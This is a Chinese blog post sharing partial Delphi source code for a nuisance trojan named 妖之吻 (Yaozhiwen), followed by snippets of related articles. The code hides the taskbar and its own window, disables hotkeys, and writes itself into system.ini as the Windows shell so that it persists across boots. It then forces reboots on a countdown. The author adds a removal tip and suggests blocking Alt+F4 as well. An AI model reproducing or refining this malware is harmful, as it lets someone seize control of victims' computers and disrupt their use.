远程关机木马“妖之吻”

最新推荐文章于 2022-02-24 18:38:02 发布
最新推荐文章于 2022-02-24 18:38:02 发布
阅读量927 收藏
点赞数
文章标签: timer shell action integer forms interface
远程关机木马“妖之吻”应该听说过吧, 下面是部分源代码:
(清除方法:system.ini文件的shell值改为explorer.exe)
unit Unit1;
interface
uses
Windows, Messages, SysUtils, Classes,inifiles, Graphics, Controls, Forms, Dialogs
,
StdCtrls, ExtCtrls, Buttons;
type
TForm1 = class(TForm)
Timer1: TTimer;
Label1: TLabel;
Timer2: TTimer;
Label2: TLabel;
SpeedButton1: TSpeedButton;
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
procedure FormClose(Sender: TObject; var Action: TCloseAction);
procedure Timer2Timer(Sender: TObject);
procedure SpeedButton1Click(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.DFM}
var
sysini:tinifile;//定一个ini,准备动手术
j,i:integer;
procedure TForm1.Timer1Timer(Sender: TObject);
begin
exitwindowsex(ewx_reboot,0);//倒数时间到,关机罗!
end;
procedure TForm1.FormCreate(Sender: TObject);
var
hregion,wndHandle : THandle;
wndClass : array[0..50] of Char;
k:string;
begin
hregion:=createellipticrgn(14,200,350,14);//想画个不规则窗体
setwindowrgn(handle,hregion,true);
StrPCopy(@wndClass[0], 'Shell_TrayWnd');
wndHandle := FindWindow(@wndClass[0], nil);
ShowWindow(wndHandle, SW_HIDE);
i:=60;
SetWindowLong(Application.Handle,GWL_EXSTYLE,WS_EX_TOOLWINDOW);
systemparametersinfo(97,1,nil,0);//屏蔽热键
timer1.Enabled:=false;
sysini:=Tinifile.Create('system.ini');
k:=sysini.ReadString('boot','shell',k);//这里准备做成启动20次恢复,
if (k='explorer') or (k='explorer.exe') then
begin
sysini.WriteInteger('mci','mcicount',20);
sysini.WriteString('boot','shell',application.ExeName);//这里用自己替换掉了shell
end
end;
procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
systemparametersinfo(97,0,nil,0);//取消屏蔽
end;
procedure TForm1.Timer2Timer(Sender: TObject);
begin
i:=i-1;
label2.Caption:=inttostr(i);
if i=1 then
begin
timer2.Enabled:=false;
timer1.Enabled:=true;
j:=sysini.ReadInteger('mci','mcicount',j);
j:=j-1;
if j=1 then
begin
sysini.WriteString('boot','shell','explorer.exe');//当启动满了20次,恢复shell
end;
end;
end;
procedure TForm1.SpeedButton1Click(Sender: TObject);//调试用的
begin
timer1.Enabled:=false;
timer2.Enabled:=false;
application.Terminate;
systemparametersinfo(97,1,nil,0);
end;
end.
还存在个问题,这个程序里面的代码没有屏蔽掉Alt+F4,可以更换成别的办法。 
  
Falcon8
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C#中Timer的触发问题
努力装文艺的213青年
07-07 3413
由于上周是考试周,因此博客没有按时更新,心里有些过意不去,感觉自己又偷懒、松懈了。哎,不管怎样,考试总算是结束了。工作重心又重新回到了项目上来,每天又能有时间去写写代码了:) 这是今天突然想起来的一个小问题,很easy,只要简单测试下就能知道结果,不过还是记录下来吧,以免以后忘记。 一、问题描述 C#中有一个Timer控件,用户可以为这个控件设定一个时间间隔,每隔一段时间Timer就会触发一
VB远程关机源码
04-23
在VB中编写远程关机源码,涉及到的知识点主要包括网络通信、系统管理以及VB编程基础。 首先,我们需要理解远程关机的基本原理。远程关机是通过网络协议(如TCP/IP)向目标计算机发送特定的命令来实现的。在Windows...
”源代码
02-23
破解法二则
weixin_34166847的博客
03-19 87
破解方法”之一  是一个恶意玩笑程序,虽然对系统没有破坏作用,但如果不幸中了以后,会使整个系统无法运行。而且能使你的计算机无法启动,陷入其中的一个死循环。如果你不会破解方法的话,可能就要重装windows.或者就是要格式化C:盘,这样就会有很大的损失,使一些宝贵的资料丢失。如果你学会破解的话的话你就没有那么多的麻烦了……   该文件是一个蠕虫程序,运行后会出...
使用timer定时器,防止事件重入
u014712365的博客
09-21 338
首先简单介绍一下timer,这里所说的timer是指的System.Timers.timer,顾名思义,就是可以在指定的间隔是引发事件。官方介绍在这里,摘抄如下: 1 2 Timer 组件是基于服务器的计时器,它使您能够指定在应用程序中引发 Elapsed 事件的周期性间隔。然后可通过处理这个事件来提供常规处理。 例如,假设您有一台关键性服务器,必须每周 7 天、每天 24 小...
G
wu_jing_sheng0的专栏
11-12 630
<br /><br />    using System; using System.Drawing;<br />    using System.Collections;<br />    using System.ComponentModel;<br />    using System.Windows.Forms; <br />    using System.Data; <br />    //using System.Messaging; <br />    using System.Net.So
linux远程关机程序,木马中如何编程实现远程关机(VC版)
weixin_30674431的博客
05-01 88
void CRebootDlg::OnCok(){// TODO: Add your control notification handler code hereHANDLE hToken;TOKEN_PRIVILEGES tkp;DWORD dwVersion; //版本号dwVersion = GetVersion(); //得到WINDOWS NT或Win32的版本号switch(m_mar...
VC++ 远程关机 小范例
12-21
标题 "VC++ 远程关机 小范例" 暗示了这是一个使用Microsoft Visual C++编程语言编写的程序,其主要功能是实现远程计算机的关机操作。在IT领域,远程关机功能通常涉及到网络通信和系统管理,这需要开发者对Windows ...
关机软件可以在同一局域网内实现远程关机任务
04-26
描述中提到,“如果要实现网络中计算机的关闭这要借助于木马,稍微有点麻烦”,这可能是指在没有专门的、安全的关机软件情况下,一些用户可能会尝试使用不正当的手段,如利用木马程序来实现远程关机。然而,这种方式...
牛精 ghost远控源码
05-22
最新源码支持WI7 2008 XP 2003 等 大部系统
C++编写的注册表完整操作源代码
04-27
C++编写的注册表完整操作源代码,程序所在文件夹名:Do_Reg
c#打造自己首款远控源码
12-19
c#打造自己首款远控系列软件,远控 木马 c#,源码
虚拟桌面(完全源代码)
07-03
虚拟桌面,只需要按WIN+空格,就可以虚拟一个新桌面,超方便的...我自己的源代码. 为了CSDN的分,我拼了...
TCP连接监控源代码
05-13
TCP连接监控源代码TCP连接监控源代码TCP连接监控源代码
局域网聊天 关机命令 cmd命令
03-17
用户可以通过运行客户端和服务端的exe文件在局域网内进行通信,并且能够使用特定的CMD命令来控制远程计算机的关机。需要注意的是,由于易语言编写的程序有时会被杀毒软件误报为病毒,但根据描述,这个程序并无后门或...
浅谈远程网络监控系统解决方案
10-22
是指通过网络对远程计算机进行操作的方法,它不仅仅包括对远程计算机进行重新启动、关机等操作、还包括对远端计算机进行日常设置的工作  远程监控系统是一款远程控制软件,有时可以当木马程序来用。近几年来,中国...
内网渗透笔记——注册表自启动与msi提权
wang_zui_zui的博客
02-24 4819
目的:进行持久化的连接 最简单的自启动: 自启动文件夹:开始➡程序➡启动(win7下) 除了通过文件夹,还可以利用Windows配置文件: win.ini、system.ini、wininit.ini等等,加载一些自动运行的程序 如果打开win.ini文件,文件中有[windows]字段,后跟Run=文件路径 LOAD=文件路径,就是我们要自启动的东西,但如果本身没有[windows]字段,手动去添加的话一般都是失败的 [windows] Run=正常运行 LOAD=启动后自动最小化运行
python远程控制木马
最新发布
09-05
远程控制木马是一种恶意软件,它通过网络连接远程主机,并允许攻击者在目标计算机上执行各种操作和命令。根据提供的引用内容,以下是一个使用Python编写的远程控制木马的示例代码: ```python # 服务端(server)程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值